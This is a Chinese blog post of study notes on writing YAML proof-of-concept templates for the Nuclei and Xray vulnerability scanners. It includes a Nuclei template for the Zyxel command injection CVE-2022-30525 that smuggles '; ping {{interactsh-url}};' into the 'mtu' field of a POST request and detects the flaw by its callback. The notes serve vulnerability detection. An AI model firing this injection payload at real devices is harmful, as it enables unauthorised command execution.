初识 POC & Yaml 编写

一、YAML 数据序列化语言

  • 大小写敏感
  • 缩进表示层级关系,使用空格缩进【不使用Tab键缩进】
  • 空格数不重要,同层级共元素对其即可

二、Nuclei YAML Poc 模板编写

1、编号 id 【项目名称(独立编号)】

2、信息 info【详细信息】

3、请求 http、tcp、dns 等【漏洞利用】

【漏洞利用后结果判断👇】

4、匹配 matchers Interactsh

5、提取 extractours

编写参考:

nuclei poc模板编写笔记 (一)

nuclei poc模板编写笔记 (二)

漏洞无回显需要使用反连平台:

#以 zyxel 未经身份验证的远程命令注入漏洞为例 CVE-2022-30525
http:
  - raw:
      - |
         POST /ztp/cgi-bin/handler HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
         Connection: close
         Content-Type: application/json
         Accept-Encoding: gzip
         
         {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{exp}}","data":"hi"}
    
    payloads:
      exp:
        - "; ping {{interactsh-url}};"

    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

三、YAML Poc Burpsuite Nuclei模板插件

1、Burpsuite 插件商城中下载 Nuclei Template Generator Plugin 插件

2、复现漏洞数据包 --> 右键将漏洞数据包发到模板插件

3、将数据包特征信息发送到模板插件

四、Xray YAML Poc 模板编写

Xray YAML 编写格式参考文档

XRAY - POC 编写工具

漏洞无回显需要使用反连平台:

1、自主搭建反连平台,并且修改 Xray 配置文件

2、需要检测漏洞回显信息【需要注册域名;修改host文件可以反连到服务器但是无法返回漏洞信息】

 posted on 2024-12-02 13:49  Jayly  阅读(52)  评论(0)    收藏  举报